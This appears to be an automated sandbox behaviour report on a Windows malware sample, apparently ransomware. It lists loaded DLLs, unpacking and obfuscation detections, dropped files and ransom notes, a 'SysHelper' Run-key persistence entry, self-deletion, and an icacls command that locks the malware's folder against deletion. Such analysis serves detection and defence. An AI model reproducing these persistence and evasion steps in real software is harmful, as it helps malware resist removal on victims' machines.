Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe	Section loaded: wer.dll
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: credui.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msvcr100.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\XVM5nluelx.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: XVM5nluelx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 33A3.exe, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Unpacked PE file: 0.2.XVM5nluelx.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dejcbcc	Unpacked PE file: 4.2.dejcbcc.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 9.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 14.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 16.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 23.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 26.2.33A3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 9.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 14.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 16.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 23.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 26.2.33A3.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00412220

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026D2 push ebx; ret	0_2_004026EA
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026ED pushad ; ret	0_2_004026F4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004026F7 push ebx; ret	0_2_00402714
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402745 push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_0040273B push edi; ret	0_2_00402742
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_00402595 push ss; ret	0_2_0040259C
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_004027BB push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E22822 push edi; ret	0_2_02E227D4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E225FC push ss; ret	0_2_02E22603
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E227A2 push edi; ret	0_2_02E227A9
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E215A4 push AFD66869h; ret	0_2_02E215A9
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E227AC push edi; ret	0_2_02E227D4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E22754 pushad ; ret	0_2_02E2275B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E2275E push ebx; ret	0_2_02E2277B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E22739 push ebx; ret	0_2_02E22751
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED44EA pushad ; iretd	0_2_02ED44EB
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9CFD push ecx; retf	0_2_02ED9CFF
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9A8D push eax; iretd	0_2_02ED9A8E
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9C75 push esi; iretd	0_2_02ED9C77
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9C71 push ds; retf	0_2_02ED9C73
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED33DD push AFD66869h; ret	0_2_02ED33E2
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED45AC push D23524A7h; retn 0006h	0_2_02ED45B4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9D33 push 4843A5D1h; retf	0_2_02ED9D3F
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026D2 push ebx; ret	4_2_004026EA
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026ED pushad ; ret	4_2_004026F4
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026F7 push ebx; ret	4_2_00402714
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402745 push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040273B push edi; ret	4_2_00402742
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402595 push ss; ret	4_2_0040259C
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004027BB push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E22822 push edi; ret	4_2_02E227D4

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	File created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\dejcbcc	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\dejcbcc

Jump to dropped file

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\xvm5nluelx.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\dejcbcc:Zone.Identifier read attributes | delete

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00481920

Uses cacls to modify the permissions of files

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
